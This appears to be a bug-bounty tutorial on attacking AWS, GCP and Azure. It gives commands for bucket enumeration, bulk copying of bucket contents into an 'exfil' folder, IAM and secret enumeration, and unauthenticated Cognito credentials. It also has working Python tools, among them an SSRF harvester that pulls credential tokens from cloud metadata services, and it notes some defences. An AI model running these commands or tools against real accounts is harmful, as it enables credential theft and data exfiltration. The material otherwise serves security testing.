Cloud Security: AWS, GCP and Azure
Cloud misconfigurations, IAM abuse, S3 bucket exploitation, SSRF to the metadata service, cloud enumeration: offensive security in AWS, GCP and Azure environments.
Cloud security is where bug bounty is heading. As companies migrate to AWS, GCP and Azure, every new managed service adds attack surface that the application team rarely reviews. IAM misconfigurations, public storage and SSRF into the metadata service are the most lucrative findings.
AWS: Attack Surface
AWS Attack Surface
├── IAM (Identity & Access Management)
│   ├── Overprivileged roles
│   ├── Access key leakage
│   └── Role assumption
├── S3 (Storage)
│   ├── Public buckets
│   ├── Misconfigured ACLs
│   └── Object-level permissions
├── EC2 (Compute)
│   ├── SSRF → metadata
│   ├── User data leakage
│   └── AMI sharing
├── Lambda (Serverless)
│   ├── Public function URL
│   ├── Environment variables
│   └── Overprivileged execution role
├── API Gateway
│   ├── Missing auth
│   └── Open endpoints
├── Cognito (Auth)
│   ├── Unauthenticated identity pools
│   └── Misconfigured user pools
└── Secrets Manager / Parameter Store
    └── Overprivileged access
S3 Bucket Enumeration
# Discover buckets
# Method 1: guess common names (virtual-host style; path style https://s3.amazonaws.com/<name>/ works too)
http://target.s3.amazonaws.com
http://target.com.s3.amazonaws.com
http://target-assets.s3.amazonaws.com
http://target-dev.s3.amazonaws.com
http://target-staging.s3.amazonaws.com
http://target-backups.s3.amazonaws.com
http://target-logs.s3.amazonaws.com
http://target-uploads.s3.amazonaws.com
http://target-data.s3.amazonaws.com
http://target-internal.s3.amazonaws.com
# Method 2: tools
# S3Scanner
python3 s3scanner.py --enum target
# cloud_enum (-k can be repeated for several keywords)
python3 cloud_enum.py -k target -k target.com
# Method 3: client-side JavaScript
# Search the source for 's3.amazonaws.com' and for AWS access key IDs
# (AKIA... = long-term key, ASIA... = temporary STS key, which also needs a session token)
grep -r "AKIA" . --include="*.js"
grep -r "s3.amazonaws.com" . --include="*.js"
# Check bucket permissions
# 404 NoSuchBucket = does not exist; 403 AccessDenied = exists but listing is denied; 200 = public listing
aws s3 ls s3://target-bucket --no-sign-request                 # public listing
aws s3 cp s3://target-bucket/config.json . --no-sign-request   # public read of one object
aws s3 sync s3://target-bucket ./exfil/ --no-sign-request      # full sync
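The manual URL guessing and the three-way verdict above (public listing, exists but denied, missing) can be scripted with the standard library alone. The block below is an added example, not code from the original page or from S3Scanner/cloud_enum: it permutes a keyword with the page's suffix list (plus a few extra suffixes, an assumption), filters the results against S3's bucket naming rules, and classifies the XML that an unsigned GET returns. The constructed S3 responses at the bottom are test data shaped like the real documents; `check_bucket` performs the live request and needs network access.

```python
"""Generate S3 bucket-name candidates and classify unauthenticated responses.

Added example (not from the original page). Standard library only; the
suffix list extends the page's wordlist (assumption).
"""
import re
import urllib.error
import urllib.request
import xml.etree.ElementTree as ET

# Suffixes: the page's list (assets, dev, staging, ...) plus a few common extras.
SUFFIXES = ["", "assets", "dev", "staging", "backups", "logs", "uploads",
            "data", "internal", "prod", "static", "media"]
SEPARATORS = ["-", ".", ""]
# Bucket naming rules: 3-63 chars, lowercase letters, digits, dots and hyphens,
# must start and end alphanumeric, no consecutive dots.
BUCKET_RE = re.compile(r"^(?=.{3,63}$)[a-z0-9][a-z0-9.-]*[a-z0-9]$")
S3_NS = "{http://s3.amazonaws.com/doc/2006-03-01/}"


def valid_bucket_name(name):
    return bool(BUCKET_RE.match(name)) and ".." not in name


def candidate_names(keyword):
    """Permute <keyword><sep><suffix> and <suffix><sep><keyword>, deduplicated,
    keeping only names S3 would accept."""
    base = keyword.lower().strip()
    names = []
    for suffix in SUFFIXES:
        for sep in SEPARATORS:
            for a, b in ((base, suffix), (suffix, base)):
                name = f"{a}{sep}{b}" if a and b else (a or b)
                if valid_bucket_name(name) and name not in names:
                    names.append(name)
    return names


def s3_error_code(body):
    """Return the <Code> of an S3 <Error> document, or None for anything else."""
    try:
        root = ET.fromstring(body)
    except ET.ParseError:
        return None
    return root.findtext("Code") if root.tag == "Error" else None


def classify(status, body):
    """Turn (HTTP status, body) from an unsigned GET on a bucket into a verdict."""
    code = s3_error_code(body)
    if status == 200 and "ListBucketResult" in body:
        return "public-listing"          # anyone can list: aws s3 ls --no-sign-request works
    if status == 403 and code in ("AccessDenied", "AllAccessDisabled"):
        return "exists-private"          # bucket exists; try known object keys or signed requests
    if status == 404 and code == "NoSuchBucket":
        return "missing"
    if status == 301 or code == "PermanentRedirect":
        return "exists-other-region"     # exists; retry against the region's endpoint
    if status == 400 and code == "InvalidBucketName":
        return "invalid"
    return f"unknown-{status}"


def listed_keys(body):
    """Object keys from a public ListBucketResult document."""
    return [k.text for k in ET.fromstring(body).iter(S3_NS + "Key")]


def check_bucket(name, timeout=5):
    """Unsigned GET, path style so dotted names do not break TLS (same idea as
    `aws s3 ls --no-sign-request`). Needs network access."""
    req = urllib.request.Request(f"https://s3.amazonaws.com/{name}/",
                                 headers={"User-Agent": "bucket-check"})
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            return classify(resp.status, resp.read().decode("utf-8", "replace"))
    except urllib.error.HTTPError as e:
        return classify(e.code, e.read().decode("utf-8", "replace"))


# Constructed S3 responses (test data), shaped like the real XML.
LISTING = ('<ListBucketResult xmlns="http://s3.amazonaws.com/doc/2006-03-01/">'
           '<Name>target-backups</Name>'
           '<Contents><Key>db-dump.sql.gz</Key><Size>1024</Size></Contents>'
           '<Contents><Key>config/.env</Key><Size>220</Size></Contents>'
           '</ListBucketResult>')
DENIED = '<Error><Code>AccessDenied</Code><Message>Access Denied</Message></Error>'
MISSING = ('<Error><Code>NoSuchBucket</Code>'
           '<Message>The specified bucket does not exist</Message></Error>')

if __name__ == "__main__":
    names = candidate_names("target")
    print(len(names), "candidates, e.g.", names[:6])
    print(classify(200, LISTING), listed_keys(LISTING))
    print(classify(403, DENIED), classify(404, MISSING))
    # Live check: for n in names: print(n, check_bucket(n))
```

A 403 is the interesting middle case: the bucket exists, so object-level guessing (`aws s3 cp s3://bucket/config.json`) and authenticated requests are still worth trying even though listing is denied.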
IAM Enumeration
# With compromised credentials (from SSRF or a leak)
export AWS_ACCESS_KEY_ID=ASIA...
export AWS_SECRET_ACCESS_KEY=...
export AWS_SESSION_TOKEN=...   # only for temporary (ASIA...) credentials
# Who am I? (account ID, user or assumed role)
aws sts get-caller-identity
# Enumerate permissions (--user-name comes from get-caller-identity; needs iam:List*/Get* on yourself)
aws iam list-attached-user-policies --user-name target
aws iam list-user-policies --user-name target
aws iam get-policy --policy-arn arn:aws:iam::xxx:policy/xxx
aws iam get-policy-version --policy-arn arn:aws:iam::xxx:policy/xxx --version-id v1
# Enumerate roles; assume-role only succeeds if the role's trust policy allows the caller
aws iam list-roles | jq '.Roles[].RoleName'
aws sts assume-role --role-arn arn:aws:iam::xxx:role/TargetRole --role-session-name hack
# Accessible S3 buckets
aws s3 ls
aws s3api list-buckets
# Lambda functions (get-function returns the environment variables and a presigned URL for the code)
aws lambda list-functions
aws lambda get-function --function-name target-func
# Secrets
aws secretsmanager list-secrets
aws secretsmanager get-secret-value --secret-id target-secret
# SSM parameters
aws ssm describe-parameters
aws ssm get-parameter --name /target/prod/db-password --with-decryption
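Listing policies is only half the job; the question is which of the allowed actions chain into full account takeover. The following is an added example, not code from the page and not Pacu's `iam__privesc_scan`: a triage heuristic over the JSON that `aws iam get-policy-version` and `get-user-policy` return, matching wildcard actions the way IAM does and checking them against a short list of well-known escalation primitives (CreatePolicyVersion, PassRole plus Lambda or EC2, and so on). The policy documents are constructed; Deny statements, Resource scoping and Conditions are deliberately ignored, so a hit means "investigate", not "confirmed".

```python
"""Triage IAM policy documents for known privilege-escalation primitives.

Added example (not from the original page, and not Pacu's iam__privesc_scan).
Deny statements, Resource scoping and Conditions are ignored on purpose:
this is a triage heuristic, not an authorization simulator.
"""
import fnmatch
import json

# Escalation paths: each needs every listed action (well-known IAM privesc primitives).
PRIVESC_PATHS = {
    "CreatePolicyVersion": ["iam:CreatePolicyVersion"],
    "SetDefaultPolicyVersion": ["iam:SetDefaultPolicyVersion"],
    "AttachUserPolicy": ["iam:AttachUserPolicy"],
    "PutUserPolicy": ["iam:PutUserPolicy"],
    "CreateAccessKey": ["iam:CreateAccessKey"],
    "CreateLoginProfile": ["iam:CreateLoginProfile"],
    "UpdateLoginProfile": ["iam:UpdateLoginProfile"],
    "AddUserToGroup": ["iam:AddUserToGroup"],
    "UpdateAssumeRolePolicy+AssumeRole": ["iam:UpdateAssumeRolePolicy", "sts:AssumeRole"],
    "PassRole+Lambda": ["iam:PassRole", "lambda:CreateFunction", "lambda:InvokeFunction"],
    "PassRole+EC2": ["iam:PassRole", "ec2:RunInstances"],
    "UpdateFunctionCode": ["lambda:UpdateFunctionCode"],
}


def _as_list(value):
    if value is None:
        return []
    return value if isinstance(value, list) else [value]


def document_from_cli(output):
    """Unwrap CLI output: get-policy-version -> PolicyVersion.Document,
    get-user-policy / get-role-policy -> PolicyDocument; a bare document passes through."""
    if isinstance(output, str):
        output = json.loads(output)
    if "PolicyVersion" in output:
        return output["PolicyVersion"]["Document"]
    return output.get("PolicyDocument", output)


def allowed_action_patterns(policy):
    """Lower-cased Action patterns from every Allow statement (Action may be a string or a list)."""
    if isinstance(policy, str):
        policy = json.loads(policy)
    patterns = []
    for stmt in _as_list(policy.get("Statement")):
        if stmt.get("Effect") == "Allow":
            patterns.extend(a.lower() for a in _as_list(stmt.get("Action")))
    return patterns


def action_allowed(action, patterns):
    """IAM matches actions case-insensitively; '*' and '?' are wildcards (e.g. iam:Pass*)."""
    return any(fnmatch.fnmatchcase(action.lower(), p) for p in patterns)


def find_privesc(policies):
    """Names of escalation paths fully covered by the union of the given documents."""
    patterns = [p for pol in policies for p in allowed_action_patterns(pol)]
    return [name for name, needed in PRIVESC_PATHS.items()
            if all(action_allowed(a, patterns) for a in needed)]


# Constructed "developer" policy (test data): looks harmless, but lambda:* plus
# iam:PassRole lets the holder run code as the lambda-exec role.
DEV_POLICY = {
    "Version": "2012-10-17",
    "Statement": [
        {"Effect": "Allow", "Action": ["s3:GetObject", "s3:ListBucket"], "Resource": "*"},
        {"Effect": "Allow", "Action": "lambda:*", "Resource": "*"},
        {"Effect": "Allow", "Action": "iam:PassRole",
         "Resource": "arn:aws:iam::123456789012:role/lambda-exec"},
    ],
}
# Constructed get-policy-version output wrapping an AdministratorAccess-style document.
ADMIN_CLI_OUTPUT = {"PolicyVersion": {"VersionId": "v1", "IsDefaultVersion": True,
                    "Document": {"Version": "2012-10-17",
                                 "Statement": {"Effect": "Allow", "Action": "*", "Resource": "*"}}}}

if __name__ == "__main__":
    print(find_privesc([DEV_POLICY]))                           # PassRole+Lambda, UpdateFunctionCode
    print(find_privesc([document_from_cli(ADMIN_CLI_OUTPUT)]))  # every path
```

Feed it every document that applies to the principal (attached managed policies, inline policies, and the group policies), since escalation paths are frequently split across several harmless-looking documents.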
Cognito Misconfiguration
# Find the identity pool ID in the JavaScript
grep -r "cognito" . --include="*.js"
# Format: <region>:<uuid>, e.g. ap-southeast-1:xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx
# Request an identity from the pool (unauthenticated call, no logins map)
aws cognito-identity get-id --identity-pool-id ap-southeast-1:xxx --region ap-southeast-1
# Exchange the IdentityId returned by get-id (not the pool ID) for AWS credentials of the unauthenticated role
aws cognito-identity get-credentials-for-identity --identity-id ap-southeast-1:xxx --region ap-southeast-1
# If the pool disallows unauthenticated identities, get-id fails with NotAuthorizedException
# With the credentials obtained, enumerate everything the unauthenticated role can reach:
aws s3 ls
aws dynamodb scan --table-name target-table
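The same two calls can be made without the AWS CLI, which is handy when checking a batch of pool IDs scraped from front-end bundles. This is an added example, not code from the page: it extracts `region:uuid` pool IDs from JavaScript, then speaks the unsigned JSON-1.1 protocol that `get-id` and `get-credentials-for-identity` use. The transport is injectable, so the flow below runs offline against two constructed pools (one open, one that returns NotAuthorizedException); the JS snippet and pool ID are made up.

```python
"""Check whether a Cognito identity pool hands out AWS credentials to
unauthenticated callers, without the AWS CLI.

Added example (not from the original page). The `post` callable is
injectable so the flow runs offline; SAMPLE_JS and the fake pools are
constructed test data.
"""
import json
import re
import urllib.error
import urllib.request

# Identity pool IDs look like <region>:<uuid>.
POOL_ID_RE = re.compile(
    r"\b([a-z]{2}-[a-z]+-\d):([0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12})\b")


def find_identity_pool_ids(js_source):
    """Pool IDs embedded in client-side JavaScript (what `grep -r cognito` surfaces)."""
    return sorted({f"{region}:{uuid}" for region, uuid in POOL_ID_RE.findall(js_source)})


def cognito_request(region, operation, payload):
    """(url, headers, body) for an unsigned Cognito Identity call; GetId and
    GetCredentialsForIdentity need no SigV4 signature."""
    url = f"https://cognito-identity.{region}.amazonaws.com/"
    headers = {"Content-Type": "application/x-amz-json-1.1",
               "X-Amz-Target": f"AWSCognitoIdentityService.{operation}"}
    return url, headers, json.dumps(payload).encode()


def http_post(url, headers, body, timeout=10):
    """Real transport. Cognito errors come back as JSON with a __type field."""
    req = urllib.request.Request(url, data=body, headers=headers, method="POST")
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            return json.loads(resp.read())
    except urllib.error.HTTPError as e:
        return json.loads(e.read())


def unauth_credentials(pool_id, post=http_post):
    """GetId with no Logins map, then GetCredentialsForIdentity. Returns the
    temporary credentials of the pool's unauthenticated role, or None when
    the pool rejects unauthenticated identities (NotAuthorizedException)."""
    region = pool_id.split(":", 1)[0]
    ident = post(*cognito_request(region, "GetId", {"IdentityPoolId": pool_id}))
    if "__type" in ident:
        return None
    creds = post(*cognito_request(region, "GetCredentialsForIdentity",
                                  {"IdentityId": ident["IdentityId"]}))
    return creds.get("Credentials")


def as_env_exports(creds):
    """Shell lines matching the export block used elsewhere on this page."""
    return "\n".join([f"export AWS_ACCESS_KEY_ID={creds['AccessKeyId']}",
                      f"export AWS_SECRET_ACCESS_KEY={creds['SecretKey']}",
                      f"export AWS_SESSION_TOKEN={creds['SessionToken']}"])


# Constructed front-end bundle fragment (test data).
SAMPLE_JS = """
AWS.config.region = 'ap-southeast-1';
AWS.config.credentials = new AWS.CognitoIdentityCredentials({
  IdentityPoolId: 'ap-southeast-1:0f0e0d0c-1b2a-4c3d-9e8f-7a6b5c4d3e2f'
});
"""


def fake_open_pool(url, headers, body):
    """Constructed responses of a pool that allows unauthenticated identities."""
    payload = json.loads(body)
    if headers["X-Amz-Target"].endswith("GetId"):
        region = payload["IdentityPoolId"].split(":")[0]
        return {"IdentityId": region + ":11111111-2222-3333-4444-555555555555"}
    return {"IdentityId": payload["IdentityId"],
            "Credentials": {"AccessKeyId": "ASIAEXAMPLEEXAMPLE00",
                            "SecretKey": "constructed-secret",
                            "SessionToken": "constructed-token", "Expiration": 1900000000}}


def fake_locked_pool(url, headers, body):
    """Constructed error of a pool with unauthenticated access disabled."""
    return {"__type": "NotAuthorizedException",
            "message": "Unauthenticated access is not supported for this identity pool."}


if __name__ == "__main__":
    pool = find_identity_pool_ids(SAMPLE_JS)[0]
    print(pool, "->", unauth_credentials(pool, post=fake_open_pool))
    print(pool, "->", unauth_credentials(pool, post=fake_locked_pool))
    # Live: unauth_credentials(pool) posts to the real endpoint via http_post.
```

Getting credentials back is the finding only if the unauthenticated role can do something it should not; run `aws sts get-caller-identity` and the S3/DynamoDB checks above with the exported credentials before reporting.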
GCP: Attack Surface
Service Account Enumeration
# With a compromised service account key
gcloud auth activate-service-account --key-file=sa-key.json
# Accessible projects
gcloud projects list
# Service accounts
gcloud iam service-accounts list
# Permissions: project-level bindings, then who may impersonate a given service account
# (<sa-name> is a placeholder; service account emails end in @<project>.iam.gserviceaccount.com)
gcloud projects get-iam-policy target-project
gcloud iam service-accounts get-iam-policy <sa-name>@target-project.iam.gserviceaccount.com
# Storage (GCS)
gsutil ls
gsutil ls gs://target-bucket/
gsutil -m cp -r gs://target-bucket/ ./exfil/
# Secrets
gcloud secrets list
gcloud secrets versions access latest --secret=target-secret
# Compute instances (describe shows metadata, startup scripts and the attached service account)
gcloud compute instances list
gcloud compute instances describe instance-1 --zone us-central1-a
# Cloud Functions
gcloud functions list
gcloud functions describe target-func
GCP Metadata via SSRF
# Required header: Metadata-Flavor: Google (without it the server answers 403, so a URL-only SSRF gets nothing)
# Service account token
http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token
# Returns {"access_token": ..., "expires_in": ..., "token_type": "Bearer"}; use it as Authorization: Bearer against Google APIs
# Startup script (the user-data equivalent)
http://metadata.google.internal/computeMetadata/v1/instance/attributes/startup-script
# SSH keys
http://metadata.google.internal/computeMetadata/v1/project/attributes/ssh-keys
# Project info
http://metadata.google.internal/computeMetadata/v1/project/project-id
http://metadata.google.internal/computeMetadata/v1/project/numeric-project-id
Azure: Attack Surface
Azure Misconfigurations
# With credentials (user, service principal or a stolen token)
az login
# Subscriptions
az account list
# Resource groups
az group list
# Storage accounts (blob listing needs an auth mode: --auth-mode login, or the account key)
az storage account list
az storage blob list --account-name targetsa --container-name uploads --auth-mode login
# Key Vault secrets (needs a Key Vault access policy or RBAC data-plane role, not just subscription access)
az keyvault secret list --vault-name target-kv
az keyvault secret show --vault-name target-kv --name db-password
# App Service configuration (app settings often hold connection strings and API keys in plain text)
az webapp config appsettings list --name target-app --resource-group target-rg
# VMs
az vm list
az vm show --name target-vm --resource-group target-rg
Azure Metadata via SSRF
# Required header: Metadata: true (IMDS rejects requests without it, so the SSRF must control headers)
# Instance metadata (subscription, resource group, VM name, network)
http://169.254.169.254/metadata/instance?api-version=2021-02-01
# Managed identity token for the ARM API
http://169.254.169.254/metadata/identity/oauth2/token?resource=https://management.azure.com/&api-version=2018-02-01
# Returns access_token (a JWT); use it as Authorization: Bearer against management.azure.com
# Token scoped to Azure Key Vault
http://169.254.169.254/metadata/identity/oauth2/token?resource=https://vault.azure.net/&api-version=2018-02-01
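The GCP and Azure sections above, and the "SSRF → metadata" item under EC2, are the same technique with three different endpoints and header requirements. The block below is an added example, not code from the page: one harvester that tries all three metadata services through an SSRF primitive modelled as `fetch(url, method, headers) -> (status, body)` (an assumption: whatever the vulnerable application lets you control). The GCP and Azure paths are the ones listed on this page; the EC2 IMDS paths are AWS's standard ones. The two fake instances at the bottom are constructed test data, and the `url_only` wrapper shows the failure mode a practitioner runs into most: IMDSv2 needs a PUT with a header, which a URL-only SSRF cannot send.

```python
"""Pull cloud credentials through an SSRF, against all three metadata services.

Added example (not from the original page). `fetch(url, method, headers)`
-> (status, body) stands for the SSRF primitive and is injected so the
logic runs offline; the fake instances are constructed test data.
"""
import json
from urllib.parse import quote

AWS_IMDS = "http://169.254.169.254/latest"
GCP_MD = "http://metadata.google.internal/computeMetadata/v1"
AZURE_IMDS = "http://169.254.169.254/metadata"


def aws_credentials(fetch):
    """IMDSv1 is a plain GET. With IMDSv2 enforced the GET gets a 401 and a PUT
    with a TTL header must come first, which a URL-only SSRF cannot send."""
    headers = {}
    creds_url = f"{AWS_IMDS}/meta-data/iam/security-credentials/"
    status, body = fetch(creds_url, "GET", headers)
    if status == 401:
        status, token = fetch(f"{AWS_IMDS}/api/token", "PUT",
                              {"X-aws-ec2-metadata-token-ttl-seconds": "60"})
        if status != 200:
            return None                        # IMDSv2 enforced and no PUT: dead end
        headers = {"X-aws-ec2-metadata-token": token.strip()}
        status, body = fetch(creds_url, "GET", headers)
    if status != 200 or not body.strip():
        return None                            # no instance profile attached
    role = body.strip().splitlines()[0]
    status, body = fetch(creds_url + role, "GET", headers)
    if status != 200:
        return None
    c = json.loads(body)
    return {"provider": "aws", "principal": role, "access_key": c["AccessKeyId"],
            "secret": c["SecretAccessKey"], "token": c["Token"], "expires": c["Expiration"]}


def gcp_token(fetch):
    """Needs Metadata-Flavor: Google; the server answers 403 without it."""
    hdr = {"Metadata-Flavor": "Google"}
    status, body = fetch(f"{GCP_MD}/instance/service-accounts/default/token", "GET", hdr)
    if status != 200:
        return None
    tok = json.loads(body)
    status, email = fetch(f"{GCP_MD}/instance/service-accounts/default/email", "GET", hdr)
    return {"provider": "gcp", "principal": email.strip() if status == 200 else "default",
            "token": tok["access_token"], "expires_in": tok["expires_in"]}


def azure_token(fetch, resource="https://management.azure.com/"):
    """Needs Metadata: true; IMDS rejects the request without it."""
    url = (f"{AZURE_IMDS}/identity/oauth2/token?api-version=2018-02-01"
           f"&resource={quote(resource, safe='')}")
    status, body = fetch(url, "GET", {"Metadata": "true"})
    if status != 200:
        return None
    tok = json.loads(body)
    return {"provider": "azure", "principal": tok.get("client_id"), "token": tok["access_token"],
            "resource": tok.get("resource"), "expires_on": tok.get("expires_on")}


def harvest(fetch):
    """Try all three; a host answers at most one of them, the others fail fast."""
    found = []
    for probe in (aws_credentials, gcp_token, azure_token):
        try:
            result = probe(fetch)
        except (ValueError, KeyError):         # not JSON / unexpected shape
            result = None
        if result:
            found.append(result)
    return found


def url_only(fetch):
    """Model the common SSRF: the attacker controls the URL, not the method or headers."""
    return lambda url, method, headers: fetch(url, "GET", {}) if method == "GET" else (405, "")


def fake_ec2_imdsv2(url, method, headers):
    """Constructed EC2 instance with IMDSv2 enforced and an instance profile attached."""
    if method == "PUT" and url.endswith("/api/token"):
        return 200, "AQAAAconstructed-token"
    if headers.get("X-aws-ec2-metadata-token") != "AQAAAconstructed-token":
        return 401, ""
    if url.endswith("/iam/security-credentials/"):
        return 200, "web-app-role\n"
    if url.endswith("/iam/security-credentials/web-app-role"):
        return 200, json.dumps({"Code": "Success", "AccessKeyId": "ASIAEXAMPLEEXAMPLE00",
                                "SecretAccessKey": "constructed", "Token": "constructed",
                                "Expiration": "2030-01-01T00:00:00Z"})
    return 404, ""


def fake_azure_vm(url, method, headers):
    """Constructed Azure VM with a system-assigned managed identity."""
    if method != "GET" or headers.get("Metadata") != "true":
        return 400, ""
    if "/identity/oauth2/token" in url:
        return 200, json.dumps({"access_token": "eyJ.constructed", "expires_on": "1900000000",
                                "client_id": "00000000-0000-0000-0000-000000000001",
                                "resource": "https://management.azure.com/"})
    return 404, ""


if __name__ == "__main__":
    print(harvest(fake_ec2_imdsv2))            # credentials of web-app-role
    print(harvest(url_only(fake_ec2_imdsv2)))  # []: IMDSv2 blocks a URL-only SSRF
    print(harvest(fake_azure_vm))              # ARM token of the managed identity
```

The same asymmetry is the defensive takeaway: on AWS, enforcing IMDSv2 (`HttpTokens=required`) turns a URL-only SSRF into a dead end, while GCP and Azure already refuse header-less requests, so an SSRF there has to give the attacker header control to be useful.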
Cloud Enumeration Tools
# Prowler (AWS security assessment)
prowler aws --profile target
# ScoutSuite (multi-cloud)
scout aws --profile target
scout gcp --user-account --project-id target-project
scout azure --cli   # or --user-account / --service-principal with --tenant target-tenant
# cloud_enum (bucket enumeration across clouds)
python3 cloud_enum.py -k target -k target.com
# S3Scanner (public bucket detection)
python3 s3scanner.py --enum target
# Pacu (AWS exploitation framework)
pacu
> run iam__enum_users_roles_policies_groups
> run iam__privesc_scan
> run s3__bucket_finder
# WeirdAAL (AWS attack library)
python3 weirdAAL.py -m recon_all -p target-profile
# enumerate-iam (what can this key do? brute-forces List*/Describe*/Get* calls; add --session-token for ASIA keys)
python3 enumerate-iam.py --access-key AKIA --secret-key xxx
Bug Bounty in the Cloud
Where to find cloud bugs
1. Public S3 buckets with sensitive data
→ Read, write, delete (depending on the permissions granted)
→ Payout: $500 to $10,000
2. SSRF → metadata access → IAM credential theft
→ Use the credentials to reach other services
→ Payout: $5,000 to $50,000+
3. Cognito identity pool with unauthenticated access
→ Obtain AWS credentials without logging in
→ Payout: $2,000 to $10,000
4. Lambda function URL without auth
→ Invoke the serverless function publicly
→ Payout: $500 to $5,000
5. API Gateway without authentication
→ API endpoints with no validation
→ Payout: $500 to $5,000
6. Key Vault / Secrets Manager with broad access
→ Service accounts that can read secrets in plain text
→ Payout: $1,000 to $10,000
7. GitHub/GitLab with hardcoded AWS keys
→ Use gitleaks/truffleHog, then confirm the key is live with aws sts get-caller-identity
→ Payout: $2,000 to $20,000
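For item 7 (and the `grep -r "AKIA"` step in the S3 section), a scanner needs to know what the credentials of each provider look like and what to do with a hit before spending the time on a live check. The block below is an added example, not code from the page and not gitleaks/truffleHog: a pattern scanner for AWS key pairs, GCP service account JSON, PEM private keys and Azure storage account keys, plus the published trick of decoding the owning AWS account ID from an access key ID (base32-decode the 16 characters after the AKIA/ASIA prefix, mask, shift by 7). The sample config fragment is constructed; its key ID was built so that it decodes to account 123456789012, and the secret is the one from AWS's documentation examples.

```python
"""Find hardcoded cloud credentials in source and triage AWS key IDs.

Added example (not from the original page, and not gitleaks/truffleHog).
SAMPLE is constructed test data.
"""
import base64
import binascii
import re

PATTERNS = [
    ("aws-access-key-id", re.compile(r"(?<![A-Z0-9])((?:AKIA|ASIA)[A-Z2-7]{16})(?![A-Z0-9])")),
    ("aws-secret-access-key", re.compile(
        r"(?i)secret[_ -]?(?:access[_ -]?)?key[\"'\s:=]+([A-Za-z0-9/+=]{40})(?![A-Za-z0-9/+=])")),
    ("gcp-service-account-json", re.compile(r"\"type\"\s*:\s*\"service_account\"")),
    ("private-key-block", re.compile(r"-----BEGIN (?:RSA |EC )?PRIVATE KEY-----")),
    ("azure-storage-account-key", re.compile(r"AccountKey=([A-Za-z0-9+/]{86}==)")),
]


def aws_account_id(key_id):
    """Account ID encoded in an AKIA/ASIA key ID, as a 12-digit string, or None.
    The 16 chars after the prefix are base32; bits 7..46 of the first 6 bytes
    hold the account number."""
    try:
        raw = base64.b32decode(key_id[4:20])          # 16 base32 chars -> 10 bytes
    except (binascii.Error, ValueError):
        return None
    value = int.from_bytes(raw[:6], "big")            # first 48 bits
    return f"{(value & 0x7FFFFFFFFF80) >> 7:012d}"


def scan_text(text):
    """Findings as dicts with line number, kind, matched value and, for AWS
    key IDs, the owning account and whether the key is temporary (ASIA)."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        for kind, rx in PATTERNS:
            for m in rx.finditer(line):
                value = m.group(1) if m.groups() else m.group(0)
                finding = {"line": lineno, "kind": kind, "value": value}
                if kind == "aws-access-key-id":
                    finding["account_id"] = aws_account_id(value)
                    finding["temporary"] = value.startswith("ASIA")
                findings.append(finding)
    return findings


# Constructed .env-style fragment (test data). The key ID decodes to account
# 123456789012; the secret is AWS's documentation example value.
SAMPLE = """
DB_HOST=db.internal
AWS_ACCESS_KEY_ID=AKIABZPUZDIKAAAAAAAA
AWS_SECRET_ACCESS_KEY=wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY
GOOGLE_CREDENTIALS={"type": "service_account", "project_id": "target-project"}
AZURE_STORAGE=DefaultEndpointsProtocol=https;AccountName=targetsa;AccountKey=""" + "A" * 86 + "==\n"

if __name__ == "__main__":
    for finding in scan_text(SAMPLE):
        print(finding)
    # Next step, from the page: export the pair and run `aws sts get-caller-identity`.
```

The decoded account ID is what makes a leaked key reportable before you touch it: it tells you whether the key belongs to the program's account at all, and an ASIA key with no session token next to it is probably expired.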